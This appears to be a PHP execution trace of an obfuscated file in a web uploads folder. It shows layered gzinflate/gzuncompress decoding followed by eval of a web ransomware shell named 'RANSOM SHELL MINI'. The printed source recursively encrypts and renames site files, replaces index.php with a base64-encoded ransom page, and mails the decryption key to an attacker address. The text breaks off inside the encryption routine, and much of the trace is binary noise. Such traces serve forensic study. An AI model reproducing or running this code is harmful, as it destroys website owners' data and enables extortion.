3 9 R '\001�$(�\001�$-�\001�$2�x�\001�$=�x��}is�F���IU��B|�}�\005�\036ㅄ}\031�6;$)�6#��Hb�����nIHB؞�<O�{��\000�ӧO��t7���J\017����Ȏ��~����8\021�\031��s\024G�r�|���b��r�ɴ���9m\000`�٨\022�lL�>�Hk�\\��\0044�a��`axN�O-c��7�ϩ|�����\026�P\r\v\036Ji�\017\036~��3E7\027��5,Q�>�an\030�p\034I�\r5y82��W,{\033\035�kw,N�MΒt\'<�JV\034�}�3�ȩ�T�a\004��,�&[R%�뉚Z��=I^72��\024���E1_��\016���d/T��\036d�*�8\024��P���*���$�>A\036ٲ$9��n0�%��\'d�1��s�[\v�~�\033�c\003A&~\021\f���a��d\033�t~qvu��ޡ�g�\002�T���]�'
3 10 0 0.000935 433664 gzinflate 0 /var/www/html/uploads/by.php(10) : eval()'d code 1 1 '\001�$(�\001�$-�\001�$2�x�\001�$=�x��}is�F���IU��B|�}�\005�\036ㅄ}\031�6;$)�6#��Hb�����nIHB؞�<O�{��\000�ӧO��t7���J\017����Ȏ��~����8\021�\031��s\024G�r�|���b��r�ɴ���9m\000`�٨\022�lL�>�Hk�\\��\0044�a��`axN�O-c��7�ϩ|�����\026�P\r\v\036Ji�\017\036~��3E7\027��5,Q�>�an\030�p\034I�\r5y82��W,{\033\035�kw,N�MΒt\'<�JV\034�}�3�ȩ�T�a\004��,�&[R%�뉚Z��=I^72��\024���E1_��\016���d/T��\036d�*�8\024��P���*���$�>A\036ٲ$9��n0�%��\'d�1��s�[\v�~�\033�c\003A&~\021\f���a��d\033�t~qvu��ޡ�g�\002�T���]�'
3 10 1 0.001150 445984
3 10 R '\001�$-�\001�$2�x�\001�$=�x��}is�F���IU��B|�}�\005�\036ㅄ}\031�6;$)�6#��Hb�����nIHB؞�<O�{��\000�ӧO��t7���J\017����Ȏ��~����8\021�\031��s\024G�r�|���b��r�ɴ���9m\000`�٨\022�lL�>�Hk�\\��\0044�a��`axN�O-c��7�ϩ|�����\026�P\r\v\036Ji�\017\036~��3E7\027��5,Q�>�an\030�p\034I�\r5y82��W,{\033\035�kw,N�MΒt\'<�JV\034�}�3�ȩ�T�a\004��,�&[R%�뉚Z��=I^72��\024���E1_��\016���d/T��\036d�*�8\024��P���*���$�>A\036ٲ$9��n0�%��\'d�1��s�[\v�~�\033�c\003A&~\021\f���a��d\033�t~qvu��ޡ�g�\002�T���]��C��wQY2'
3 11 0 0.001361 429568 gzinflate 0 /var/www/html/uploads/by.php(10) : eval()'d code 1 1 '\001�$-�\001�$2�x�\001�$=�x��}is�F���IU��B|�}�\005�\036ㅄ}\031�6;$)�6#��Hb�����nIHB؞�<O�{��\000�ӧO��t7���J\017����Ȏ��~����8\021�\031��s\024G�r�|���b��r�ɴ���9m\000`�٨\022�lL�>�Hk�\\��\0044�a��`axN�O-c��7�ϩ|�����\026�P\r\v\036Ji�\017\036~��3E7\027��5,Q�>�an\030�p\034I�\r5y82��W,{\033\035�kw,N�MΒt\'<�JV\034�}�3�ȩ�T�a\004��,�&[R%�뉚Z��=I^72��\024���E1_��\016���d/T��\036d�*�8\024��P���*���$�>A\036ٲ$9��n0�%��\'d�1��s�[\v�~�\033�c\003A&~\021\f���a��d\033�t~qvu��ޡ�g�\002�T���]��C��wQY2'
3 11 1 0.001568 441888
3 11 R '\001�$2�x�\001�$=�x��}is�F���IU��B|�}�\005�\036ㅄ}\031�6;$)�6#��Hb�����nIHB؞�<O�{��\000�ӧO��t7���J\017����Ȏ��~����8\021�\031��s\024G�r�|���b��r�ɴ���9m\000`�٨\022�lL�>�Hk�\\��\0044�a��`axN�O-c��7�ϩ|�����\026�P\r\v\036Ji�\017\036~��3E7\027��5,Q�>�an\030�p\034I�\r5y82��W,{\033\035�kw,N�MΒt\'<�JV\034�}�3�ȩ�T�a\004��,�&[R%�뉚Z��=I^72��\024���E1_��\016���d/T��\036d�*�8\024��P���*���$�>A\036ٲ$9��n0�%��\'d�1��s�[\v�~�\033�c\003A&~\021\f���a��d\033�t~qvu��ޡ�g�\002�T���]��C��wQY2���}�'
3 12 0 0.001776 429568 gzinflate 0 /var/www/html/uploads/by.php(10) : eval()'d code 1 1 '\001�$2�x�\001�$=�x��}is�F���IU��B|�}�\005�\036ㅄ}\031�6;$)�6#��Hb�����nIHB؞�<O�{��\000�ӧO��t7���J\017����Ȏ��~����8\021�\031��s\024G�r�|���b��r�ɴ���9m\000`�٨\022�lL�>�Hk�\\��\0044�a��`axN�O-c��7�ϩ|�����\026�P\r\v\036Ji�\017\036~��3E7\027��5,Q�>�an\030�p\034I�\r5y82��W,{\033\035�kw,N�MΒt\'<�JV\034�}�3�ȩ�T�a\004��,�&[R%�뉚Z��=I^72��\024���E1_��\016���d/T��\036d�*�8\024��P���*���$�>A\036ٲ$9��n0�%��\'d�1��s�[\v�~�\033�c\003A&~\021\f���a��d\033�t~qvu��ޡ�g�\002�T���]��C��wQY2���}�'
3 12 1 0.001982 441888
3 12 R 'x�\001�$=�x��}is�F���IU��B|�}�\005�\036ㅄ}\031�6;$)�6#��Hb�����nIHB؞�<O�{��\000�ӧO��t7���J\017����Ȏ��~����8\021�\031��s\024G�r�|���b��r�ɴ���9m\000`�٨\022�lL�>�Hk�\\��\0044�a��`axN�O-c��7�ϩ|�����\026�P\r\v\036Ji�\017\036~��3E7\027��5,Q�>�an\030�p\034I�\r5y82��W,{\033\035�kw,N�MΒt\'<�JV\034�}�3�ȩ�T�a\004��,�&[R%�뉚Z��=I^72��\024���E1_��\016���d/T��\036d�*�8\024��P���*���$�>A\036ٲ$9��n0�%��\'d�1��s�[\v�~�\033�c\003A&~\021\f���a��d\033�t~qvu��ޡ�g�\002�T���]��C��wQY2���}���f��?H'
3 13 0 0.002191 429568 gzuncompress 0 /var/www/html/uploads/by.php(10) : eval()'d code 1 1 'x�\001�$=�x��}is�F���IU��B|�}�\005�\036ㅄ}\031�6;$)�6#��Hb�����nIHB؞�<O�{��\000�ӧO��t7���J\017����Ȏ��~����8\021�\031��s\024G�r�|���b��r�ɴ���9m\000`�٨\022�lL�>�Hk�\\��\0044�a��`axN�O-c��7�ϩ|�����\026�P\r\v\036Ji�\017\036~��3E7\027��5,Q�>�an\030�p\034I�\r5y82��W,{\033\035�kw,N�MΒt\'<�JV\034�}�3�ȩ�T�a\004��,�&[R%�뉚Z��=I^72��\024���E1_��\016���d/T��\036d�*�8\024��P���*���$�>A\036ٲ$9��n0�%��\'d�1��s�[\v�~�\033�c\003A&~\021\f���a��d\033�t~qvu��ޡ�g�\002�T���]��C��wQY2���}���f��?H'
3 13 1 0.002401 441888
3 13 R 'x��}is�F���IU��B|�}�\005�\036ㅄ}\031�6;$)�6#��Hb�����nIHB؞�<O�{��\000�ӧO��t7���J\017����Ȏ��~����8\021�\031��s\024G�r�|���b��r�ɴ���9m\000`�٨\022�lL�>�Hk�\\��\0044�a��`axN�O-c��7�ϩ|�����\026�P\r\v\036Ji�\017\036~��3E7\027��5,Q�>�an\030�p\034I�\r5y82��W,{\033\035�kw,N�MΒt\'<�JV\034�}�3�ȩ�T�a\004��,�&[R%�뉚Z��=I^72��\024���E1_��\016���d/T��\036d�*�8\024��P���*���$�>A\036ٲ$9��n0�%��\'d�1��s�[\v�~�\033�c\003A&~\021\f���a��d\033�t~qvu��ޡ�g�\002�T���]��C��wQY2���}���f��?H�eXϖd\032'
3 14 0 0.002625 429568 gzuncompress 0 /var/www/html/uploads/by.php(10) : eval()'d code 1 1 'x��}is�F���IU��B|�}�\005�\036ㅄ}\031�6;$)�6#��Hb�����nIHB؞�<O�{��\000�ӧO��t7���J\017����Ȏ��~����8\021�\031��s\024G�r�|���b��r�ɴ���9m\000`�٨\022�lL�>�Hk�\\��\0044�a��`axN�O-c��7�ϩ|�����\026�P\r\v\036Ji�\017\036~��3E7\027��5,Q�>�an\030�p\034I�\r5y82��W,{\033\035�kw,N�MΒt\'<�JV\034�}�3�ȩ�T�a\004��,�&[R%�뉚Z��=I^72��\024���E1_��\016���d/T��\036d�*�8\024��P���*���$�>A\036ٲ$9��n0�%��\'d�1��s�[\v�~�\033�c\003A&~\021\f���a��d\033�t~qvu��ޡ�g�\002�T���]��C��wQY2���}���f��?H�eXϖd\032'
3 14 1 0.002942 462368
3 14 R '<!DOCTYPE html>\r\n<html>\r\n<head>\r\n <title>RANSOM SHELL MINI</title>\r\n<style type="text/css">\r\nbody {\r\n background: #1A1C1F;\r\n color: #e2e2e2;\r\n}\r\n.inpute{\r\n border-style: dotted;\r\n border-color: #379600;\r\n background-color: transparent;\r\n color: white;\r\n text-align: center;\r\n}\r\n.selecte{\r\n border-style: dotted;\r\n border-color: green;\r\n background-color: transparent;\r\n color: green;\r\n}\r\n.submite{\r\n border-style: dotted;\r\n'
3 15 0 0.003496 567784 eval 1 '?><!DOCTYPE html>\r\n<html>\r\n<head>\r\n <title>RANSOM SHELL MINI</title>\r\n<style type="text/css">\r\nbody {\r\n background: #1A1C1F;\r\n color: #e2e2e2;\r\n}\r\n.inpute{\r\n border-style: dotted;\r\n border-color: #379600;\r\n background-color: transparent;\r\n color: white;\r\n text-align: center;\r\n}\r\n.selecte{\r\n border-style: dotted;\r\n border-color: green;\r\n background-color: transparent;\r\n color: green;\r\n}\r\n.submite{\r\n border-style: dotted;\r\n border-color: #4CAF50;\r\n background-color: transparent;\r\n color: white;\r\n}\r\n.result{\r\n text-align: left;\r\n}\r\n</style>\r\n<link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css">\r\n</head>\r\n<body>\r\n<div class="result">\r\n<?php\r\nerror_reporting(0);\r\nset_time_limit(0);\r\nini_set(\'memory_limit\', \'-1\');\r\nclass deRanSomeware\r\n{\r\n public function shcpackInstall(){\r\n if(!file_exists(".htaFuck")){\r\n rename(".htaccess", ".htaFuck");\r\n if(fwrite(fopen(\'.htaccess\', \'w\'), "#5H311_1NJ3C706\\r\\nDirectoryIndex index.php\\r\\nErrorDocument 404 /index.php")){\r\n echo \'<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> .htaccess (Default Page)<br>\';\r\n }\r\n if(file_put_contents("index.php", base64_decode("CjwhRE9DVFlQRSBodG1sPgo8aHRtbD4KICAgPGhlYWQ+CgkgIDx0aXRsZT5BbGwgWW91ciBXZWJzaXRlIERhdGFiYXNlIEZpbGVzIEFyZSBFbmNyeXB0ZWQ8L3RpdGxlPgogICAgICA8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+CiAgICAgIDxtZXRhIGNvbnRlbnQ9IjVIMzExXzFOSjNDNzA2IiBuYW1lPSJkZXNjcmlwdGlvbiIvPgogICAgICA8bWV0YSBjb250ZW50PSI1SDMxMV8xTkozQzcwNiIgbmFtZT0ia2V5d29yZHMiLz4KICAgICAgPG1ldGEgcHJvcGVydHk9Im9nOmltYWdlIiBjb250ZW50PSJodHRwOi8vczI5LnBvc3RpbWcub3JnLzdydTJxNzZqYi9rY3dfbG9nb19kZWZhY2UucG5nIiAvPgoKICAgICAgPGxpbmsgaHJlZj0iaHR0cDovL2ZvbnRzLmdvb2dsZWFwaXMuY29tL2Nzcz9mYW1pbHk9QmxhY2srT3BzK09uZXxNb250c2VycmF0fENhYmluK1NrZXRjaHxPcmJpdHJvbnxBcmNoaXRlY3RzK0RhdWdodGVyfFBlcm1hbmVudCtNYXJrZXJ8THVja2llc3QrR3V5fENoZXJyeStDcmVhbStTb2RhIiByZWw9InN0eWxlc2hlZXQiIC8+CiAgICAgIDxsaW5rIGhyZWY9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2FuaW1hdGUuY3NzLzMuNS4yL2FuaW1hdGUubWluLmNzcyIgcmVsPSJzdHlsZXNoZWV0IiAvPgogICAgICA8bGluayBocmVmPSJodHRwczovL2NkbmpzLmNsb3VkZmxhcmUuY29tL2FqYXgvbGlicy9mb250LWF3ZXNvbWUvNC43LjAvY3NzL2ZvbnQtYXdlc29tZS5taW4uY3NzIiByZWw9InN0eWxlc2hlZXQiIC8+CiAgICAgIDxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Imh0dHA6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LWxhdGVzdC5taW4uanMiPjwvc2NyaXB0PgogICAgICAKCiAgICAgIDwhLS0gQ1NTIFNUQVJUIEhFUkUgLS0+CiAgICAgIDxzdHlsZT4KCQkgaHRtbCwgYm9keSB7bWluLWhlaWdodDogMTAwJTt9CiAgICAgICAgIGJvZHkgewoJCSB3aWR0aDogMTAwJTsKCQkgaGVpZ2h0OiAxMDAlOwogICAgICAgICBtYXJnaW46IDA7CiAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgIGJhY2tncm91bmQtaW1hZ2U6IHVybCgnaHR0cHM6Ly9pbWFnZXM0LmFscGhhY29kZXJzLmNvbS82MzQvdGh1bWItMTkyMC02MzQ0NC5qcGcnKTsKICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogIzAwMDsKICAgICAgICAgYmFja2dyb3VuZC1yZXBlYXQ6IG5vLXJlcGVhdDsKICAgICAgICAgYmFja2dyb3VuZC1wb3NpdGlvbjogY2VudGVyOwogICAgICAgICBiYWNrZ3JvdW5kLXNpemU6IDE1MCU7CiAgICAgICAgIGJhY2tncm91bmQtY29sb3I6ICMwMDA7CiAgICAgICAgIGNvbG9yOiAjRkZGRkZGOwogICAgICAgICBmb250LWZhbWlseToiT3JiaXRyb24iOwogICAgICAgICBmb250LXNpemU6IDE0cHQ7CiAgICAgICAgIHRleHQtYWxpZ246IGNlbnRlcjsKICAgICAgICAgdGV4dC1kZWNvcmF0aW9uOiBub25lOwogICAgICAgICB9IAogICAgICAgICBhIHsgdGV4dC1kZWNvcmF0aW9uOiBub25lOyB9CiAgICAgICAgIC52aXMgewoJCSAgdGV4dC1zaGFkb3c6IDJweCAycHggMnB4ICMwMDA7CgkJIH0KICAgICAgICAgLmdsb3cgewogICAgICAgICB0ZXh0LXNoYWRvdzogMCAwIDEwcHggI0Y1OTcwMDsKICAgICAgICAgZm9udC1mYW1pbHk6IkJsYWNrIE9wcyBPbmUiOwogICAgICAgICB9CiAgICAgICAgIC5ibHVlZ2xvdyB7CiAgICAgICAgIHRleHQtc2hhZG93OiAwIDAgMTBweCAjMEY2RkJEOwogICAgICAgICBmb250LWZhbWlseToiQmxhY2sgT3BzIE9uZSIKICAgICAgICAgfQogICAgICAgICAud2hpdGVnbG93LC5ndyB7CiAgICAgICAgIHRleHQtc2hhZG93OiAwIDAgNXB4ICNGRkZGRkY7CiAgICAgICAgIGZvbnQtZmFtaWx5OiJCbGFjayBPcHMgT25lIjsKICAgICAgICAgfQoKICAgICAgICAgI2hlbGxvIHsKICAgICAgICAgZm9udC1zaXplOiAyMHB4OwogICAgICAgICAtbW96LXRyYW5zaXRpb246IGNvbG9yIDFzOwogICAgICAgICAtd2Via2l0LXRyYW5zaXRpb246IGNvbG9yIDFzOwogICAgICAgICAtbXMtdHJhbnNpdGlvbjogY29sb3IgMXM7CiAgICAgICAgIC1vLXRyYW5zaXRpb246IGNvbG9yIDFzOwogICAgICAgICB0cmFuc2l0aW9uOiBjb2xvciAxLjJzOwogICAgICAgICBmb250LWZhbWlseToiQmxhY2sgT3BzIE9uZSIKICAgICAgICAgfQogICAgICAgICAjaGVsbG86aG92ZXIgewogICAgICAgICBjb2xvcjogeWVsbG93OwogICAgICAgICAtd2Via2l0LXN0cm9rZS13aWR0aDogMTBweDsKICAgICAgICAgLXdlYmtpdC1zdHJva2UtY29sb3I6ICNGRkZGRkY7CiAgICAgICAgIC13ZWJraXQtZmlsbC1jb2xvcjogI0ZGRkZGRjsKICAgICAgICAgdGV4dC1zaGFkb3c6IDFweCAwcHggMjBweCByZWQ7CiAgICAgICAgIGZvbnQtZmFtaWx5OiJCbGFjayBPcHMgT25lIgogICAgICAgICB9CiAgICAgICAgIC5jbjEsLmdnIHsKICAgICAgICAgdGV4dC1zaGFkb3c6IDAgMCAxM3B4ICM1N2Y5Mjc7CiAgICAgICAgIGZvbnQtZmFtaWx5OiJCbGFjayBPcHMgT25lIjsKICAgICAgICAgfQogICAgICAgICAuY25hLC5nbyB7CiAgICAgICAgIHRleHQtc2hhZG93OiAwIDAgMTNweCAjZjk5OTFkOwogICAgICAgICBmb250LWZhbWlseToiQmxhY2sgT3BzIE9uZSI7CiAgICAgICAgIH0KICAgICAgICAgLmdyIHsKICAgICAgICAgdGV4dC1zaGFkb3c6IDAgMCAxM3B4IHJlZDsKICAgICAgICAgZm9udC1mYW1pbHk6IkJsYWNrIE9wcyBPbmUiOwogICAgICAgICB9CiAgICAgICAgIC5rY3dpbWcgeyAKICAgICAgICAgd2lkdGg6IDE2MHB4OwogICAgICAgICBoZWlnaHQ6IDE0MHB4OyAKICAgICAgICAgfSAKICAgICAgICAgLmNhcHMgewogICAgICAgICB0ZXh0LXRyYW5zZm9ybTogdXBwZXJjYXNlOwogICAgICAgICBmb250LWZhbWlseTogIkNhYmluIFNrZXRjaCI7CiAgICAgICAgIH0KCiAgICAgICAgICNuZW9uZm9udAogICAgICAgICB7CiAgICAgICAgIHRleHQtc2hhZG93OiAwIDAgNXB4IHJlZDsKICAgICAgICAgLXdlYmtpdC10cmFuc2l0aW9uOiB0ZXh0LXNoYWRvdyAycyBlYXNlLW91dDsKICAgICAgICAgLW1vei10cmFuc2l0aW9uOiB0ZXh0LXNoYWRvdyAycyBlYXNlLW91dDsKICAgICAgICAgLW8tdHJhbnNpdGlvbjogdGV4dC1zaGFkb3cgMnMgZWFzZS1vdXQ7CiAgICAgICAgIHRyYW5zaXRpb246IHRleHQtc2hhZG93IDJzIGVhc2Utb3V0OwogICAgICAgICBmb250LXNpemU6MzVweDsKICAgICAgICAgZm9udC13ZWlnaHQ6IGJvbGRlcjsKICAgICAgICAgfQogICAgICAgICAjbmVvbmZvbnQ6aG92ZXJ7CiAgICAgICAgIHRleHQtc2hhZG93OiAwIDAgMzBweCByZWQ7CiAgICAgICAgIH0KICAgICAgICAgLm1lZ2EgewogICAgICAgICB0ZXh0LXNoYWRvdzogNHB4IDAgOHB4ICMwMDczQjk7CiAgICAgICAgIGZvbnQtd2VpZ2h0OiBib2xkZXI7CiAgICAgICAgIGZvbnQtZmFtaWx5OiAiQXJjaGl0ZWN0cyBEYXVnaHRlciI7CiAgICAgICAgIH0KICAgICAgICAgLndlYXJlIHsKICAgICAgICAgZm9udC1mYW1pbHk6ICJQZXJtYW5lbnQgTWFya2VyIjsKICAgICAgICAgdGV4dC1zaGFkb3c6IDAgMCAzcHggcmVkOwogICAgICAgICBmb250LXNpemU6IDEuM2VtOwogICAgICAgICB9CiAgICAgICAgIC50aHVtYiB7CiAgICAgICAgIHdpZHRoOiAxNTBweDsgCiAgICAgICAgIGhlaWdodDogMTkwcHg7IAogICAgICAgICBtYXJnaW46IDcwcHggYXV0bzsKICAgICAgICAgcGVyc3BlY3RpdmU6IDEwMDBweDsKICAgICAgICAgfQogICAgICAgICAudGh1bWIgc3BhbiB7CiAgICAgICAgIGRpc3BsYXk6IGJsb2NrOyB3aWR0aDogMTAwJTsgaGVpZ2h0OiAxMDAlOwogICAgICAgICBiYWNrZ3JvdW5kOiAKICAgICAgICAgbGluZWFyLWdyYWRpZW50KHJnYmEoMCwgMCwgMCwgMC40KSwgcmdiYSgwLCAwLCAwLCAwLjQpKSwgdXJsKCJodHRwOi8vczI5LnBvc3RpbWcub3JnLzdydTJxNzZqYi9rY3dfbG9nb19kZWZhY2UucG5nIik7CiAgICAgICAgIGJhY2tncm91bmQtc2l6ZTogMCwgY292ZXI7CiAgICAgICAgIHRyYW5zZm9ybS1zdHlsZTogcHJlc2VydmUtM2Q7CiAgICAgICAgIHRyYW5zaXRpb246IGFsbCAwLjVzOwogICAgICAgICB9CiAgICAgICAgIGhyIHsKCQkJIGJveC1zaGFkb3c6IDNweCAzcHggM3B4IDNweCAjODg4ODg4OwoJCQkgY29sb3I6I2ZmZjsKCQkJIG1hcmdpbi1ib3R0b206IDJweDsKCQkgfQoJCSAuZ3JlZWV0IHsKCQkJIGZvbnQtZmFtaWx5OkFsZHJpY2g7Zm9udC13ZWlnaHQ6Ym9sZDtmb250LXNpemU6MTdweDsKCQkgfSAKCQkgLmVuaGFuY2UgewoJCQkgcGFkZGluZzogMWVtIDFlbTsKCQkJIGJhY2tncm91bmQ6dXJsKCcnKTsKCQkgfQoJCSAubm9wIHsKCQkJIGJhY2tncm91bmQ6IHJnYmEoMzIsIDMyLCAzMiwgLjQpOwogICAgICAgICAgICAgICAgICAgICAgICAgcGFkZGluZzogOHB4IDhweDsKCQkgfSAKCQkgLmlwa2V5IHsKCQkJIHdpZHRoOiAyMCU7CiAgICAgICAgICAgICB0cmFuc2l0aW9uOiB3aWR0aCAxczsKICAgICAgICAgICAgIC13ZWJraXQtdHJhbnNpdGlvbjogd2lkdGggMXM7CiAgICAgICAgICAgICAtbW96LXRyYW5zaXRpb246IHdpZHRoIDFzOwogICAgICAgICAgICAgaGVpZ2h0OiA0MHB4OwogICAgICAgICAgICAgZm9udC1mYW1pbHk6TW9udHNlcnJhdDtmb250LXdlaWdodDpib2xkO2ZvbnQtc2l6ZToyNXB4OwoJCSB9CgkJIC5pcGtleTpob3ZlciB7CgkJCSB3aWR0aDogMzAlOwoJCSB9CgkJIC5pcHR4dCB7CgkJCSB3aWR0aDogNTAlOwoJCQkgaGVpZ2h0OiA0MHB4OwoJCQkgZm9udC1mYW1pbHk6TW9udHNlcnJhdDtmb250LXdlaWdodDpib2xkO2ZvbnQtc2l6ZToxNXB4OwoJCSB9CgkJIC5idXR0b24gewoJCQkgYmFja2dyb3VuZDogIzY2NjsKCQkJIGJvcmRlcjogMXB4IHNvbGlkICNmZmY7CgkJCSBoZWlnaHQ6IDQwcHg7CgkJCSBmb250LXNpemU6IDIwcHg7CgkJCSBib3JkZXItcmFkaXVzOiA1cHggNXB4IDVweCA1cHg7CgkJCSB0ZXh0LXRyYW5zZm9ybTogdXBwZXJjYXNlOwoJCQkgY29sb3I6ICNmZmY7CgkJIH0KCQkgLmJ1dHRvbjpob3ZlciB7CgkJCSBiYWNrZ3JvdW5kOiAjMDAwOwoJCSB9CiAgICAgIDwvc3R5bGU+CiAgIDwvaGVhZD4KICAgCiAgIDxib2R5PgogICAgICA8ZW1iZWQgc3JjPSJodHRwczovL2RsLmRyb3Bib3h1c2VyY29udGVudC5jb20vcy9tbnc5MXFhb2I1MG96dmwvd2UlMjBhcmUlMjBhbm9ueW1vdXMubXAzP2RsPTAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIC8+CiAgICAgIDxjZW50ZXI+CgkJICAKICAgICAgICAgPCEtLSB3aG8gd2UgYXJlPyAtLT4KICAgICAgICAgPGRpdiBpZD0iaGVhZGVyIj4KCQkgICA8c3BhbiBjbGFzcz0iZ2xvdyIgc3R5bGU9ImZvbnQtc2l6ZTogMzBwdDsiPuKAqjxpIGNsYXNzPSJmYSBmYS1oYW5kLW8tcmlnaHQiIGFyaWEtaGlkZGVuPSJ0cnVlIj48L2k+IEJMQUNLIFBIQU5UT00gQ1lCRVIgPGkgY2xhc3M9ImZhIGZhLWhhbmQtby1sZWZ0IiBhcmlhLWhpZGRlbj0idHJ1ZSI+PC9pPjwvc3Bhbj48YnIvPgoJCSAgIAkJICAKICAgICAgICAgICA8ZGl2IGNsYXNzPSJhbmltYXRlZCBmbGlwIj48c3BhbiBjbGFzcz0iYmx1ZWdsb3cgY2FwcyI+PGZvbnQgc2l6ZT0iNSI+PGkgY2xhc3M9ImZhIGZhLXJhdmVscnkiIGFyaWEtaGlkZGVuPSJ0cnVlIj48L2k+IFlPVVIgU0lURSBJUyBJTkZFQ1RFRCBCWSBSQU5TT01XQVJFIDxpIGNsYXNzPSJmYSBmYS1yYXZlbHJ5IiBhcmlhLWhpZGRlbj0idHJ1ZSI+PC9pPjwvZm9udD48L3NwYW4+PC9kaXY+CiAgICAgICAgIDwvZGl2PgogICAgICAgICA8IS0tIEJQQyBMb2dvIC0tPiAKICAgICAgICAgPGRpdiBjbGFzcz0idGh1bWIga2N3aW1nIj4KICAgICAgICAgICAgPHNwYW4+PC9zcGFuPgogICAgICAgICA8L2Rpdj4KICAgICAgCiAgICAgICAgIDwhLS1lbmNyeXB0IG1zZyAtLT4KICAgICAgICAgPGRpdiBjbGFzcz0iYW5pbWF0ZWQgaW5maW5pdGUgZmxhc2giPjxzcGFuIGNsYXNzPSJnciIgc3R5bGU9J2NvbG9yOmJsYWNrOyBmb250LWZhbWlseTogIkx1Y2tpZXN0IEd1eSInPjxmb250IHNpemU9IjUiPjxpIGNsYXNzPSJmYSBmYS1sb2NrIiBhcmlhLWhpZGRlbj0idHJ1ZSI+PC9pPiBZT1VSIEZJTEVTIEhBVkUgQkVFTiBFTkNSWVBURUQgPGkgY2xhc3M9ImZhIGZhLWxvY2siIGFyaWEtaGlkZGVuPSJ0cnVlIj48L2k+PC9mb250Pjwvc3Bhbj48L2Rpdj4KICAgICAgICAgPGJyPgogICAgICAgICA8IS0tIGtleSAtLT4KICAgICAgICAgPGRpdiBjbGFzcz0ibm9wIj4KICAgICAgICAgPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCI+CiAgICAgICAgIDxwPjxpIGNsYXNzPSJmYSBmYS1oYW5kLW8tZG93biIgYXJpYS1oaWRkZW49InRydWUiPjwvaT4gRU5URVIgVEhFIEtFWSBUTyBERUNSWVBUIEZJTEVTIDxpIGNsYXNzPSJmYSBmYS11bmxvY2siIGFyaWEtaGlkZGVuPSJ0cnVlIj48L2k+PC9wPgogICAgICAgICA8aW5wdXQgdHlwZT0idGV4dCIgY2xhc3M9Imlwa2V5IiBuYW1lPSJpb2tleSIgLz4KICAgICAgICAgPC9mb3JtPgogICAgICAgICA8L2Rpdj4gICAgICAgICA8IS0tIEk0TSAtLT4KICAgICAgICAgPGgxIHN0eWxlPSdmb250LWZhbWlseTogIkNoZXJyeSBDcmVhbSBTb2RhIjsnPjxiPuKclzxzcGFuIGNsYXNzPSJtZWdhIj41SDMxMV8xTkozQzcwNjwvc3Bhbj7inJc8L2I+PC9oMT4KICAgICAgICAgPGJyPgogICAgICAgICA8YnI+CiAgICAgICAgIAoKICAgICAgICAgPCEtLSB3YXJuaW5nIC0tPgogICAgICAgICAgIDxkaXYgY2xhc3M9IndlYXJlIj5XZSBhcmUgTGVnaW9uLi4uIFdlIGRvIG5vdCBGb3JnaXZlLi4uIFdlIGRvIG5vdCBGb3JnZXQuLi4gPGI+PGk+RXhwZWN0IHVzPC9pPjwvYj48L2Rpdj4KICAgICAgICAgICA8YnI+CiAgIDwvYm9keT4KPC9odG1sPg=="))){\r\n echo \'<i class="fa fa-thumbs-o-up" aria-hidden="true"></i> index.php (Default Page)<br>\';\r\n }\r\n }\r\n }\r\n public function shcpackUnstall(){\r\n\r\n if( file_exists(".htaFuck") ){\r\n if( unlink(".htaccess") && unlink("index.php") ){\r\n echo \'<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> .htaccess (Default Page)<br>\';\r\n echo \'<i class="fa fa-thumbs-o-down" aria-hidden="true"></i> index.php (Default Page)<br>\';\r\n }\r\n rename(".htaFuck", ".htaccess");\r\n }\r\n\r\n }\r\n\r\n public function plus(){\r\n flush();\r\n ob_flush();\r\n }\r\n public function locate(){\r\n return getcwd();\r\n }\r\n public function shcdirs($dir,$method,$key){\r\n switch ($method) {\r\n case \'1\':\r\n deRanSomeware::shcpackInstall();\r\n break;\r\n case \'2\':\r\n deRanSomeware::shcpackUnstall();\r\n break;\r\n }\r\n foreach(scandir($dir) as $d)\r\n {\r\n if($d!=\'.\' && $d!=\'..\')\r\n {\r\n $locate = $dir.DIRECTORY_SEPARATOR.$d;\r\n if(!is_dir($locate)){\r\n if( deRanSomeware::kecuali($locate,"ransmini.php") && deRanSomeware::kecuali($locate,".pnjg") && deRanSomeware::kecuali($locate,".htaccess") && deRanSomeware::kecuali($locate,"index.php") && deRanSomeware::kecuali($locate,"indehx.php") && deRanSomeware::kecuali($locate,".htalol") ){\r\n switch ($method) {\r\n case \'1\':\r\n deRanSomeware::shcEnCry($key,$locate);\r\n deRanSomeware::shcEnDesDirS($locate,"1");\r\n break;\r\n case \'2\':\r\n deRanSomeware::shcDeCry($key,$locate);\r\n deRanSomeware::shcEnDesDirS($locate,"2");\r\n break;\r\n }\r\n }\r\n }else{\r\n deRanSomeware::shcdirs($locate,$method,$key);\r\n }\r\n }\r\n deRanSomeware::plus();\r\n }\r\n deRanSomeware::report($key);\r\n }\r\n\r\n public function report($key){\r\n $message.= "========= Tuyuljahat =========\\n";\r\n $message.= "Website : ".$_SERVER[\'HTTP_HOST\'];\r\n $message.= "Key : ".$key;\r\n $message.= "========= Ransomware =========\\n";\r\n $subject = "Report Ransomeware";\r\n $headers = "From: Tuyul <TuyulJahat86@gmail.com>\\r\\n";\r\n mail("TuyulJahat86@gmail.com",$subject,$message,$headers);\r\n }\r\n\r\n public function shcEnDesDirS($locate,$method){\r\n switch ($method) {\r\n case \'1\':\r\n rename($locate, $locate.".Encrypted");\r\n break;\r\n case \'2\':\r\n $locates = str_replace(".Encrypted", "", $locate);\r\n rename($locate, $locates);\r\n break;\r\n }\r\n }\r\n\r\n public function shcEnCry($key,$locate){\r\n $data = file_get_contents($locate);\r\n $iv = mcrypt_create_iv(\r\n mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC),\r\n MCRYPT_DEV_URANDOM\r\n 